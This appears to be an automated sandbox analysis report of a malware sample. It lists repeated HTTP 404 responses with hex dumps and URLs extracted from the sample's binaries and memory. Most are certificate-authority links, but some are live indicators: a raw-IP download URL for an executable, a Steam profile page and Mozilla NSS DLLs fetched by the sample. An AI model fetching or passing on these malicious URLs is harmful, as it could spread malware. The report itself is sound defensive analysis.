                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:29:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:31:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: 38F9.exe, 00000006.00000002.2346667476.0000000000649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.54/file/host_so.exe
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: explorer.exe, 00000001.00000000.1721748248.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723237920.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: explorer.exe, 00000001.00000000.1721748248.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723237920.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                Source: explorer.exe, 00000001.00000000.1721748248.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723237920.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: explorer.exe, 00000001.00000000.1721748248.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723237920.000000000982D000.00000004.00000001.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0N
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: explorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: 38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: D818.exe, 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000000.2303573483.00000000004B4000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
                Source: explorer.exe, 00000001.00000000.1724106836.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1722399580.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1722761603.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: katB4C0.tmp, 0000000B.00000002.2791549428.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: katB4C0.tmp, katB4C0.tmp, 0000000B.00000002.2822044307.000000006D0CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.11.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
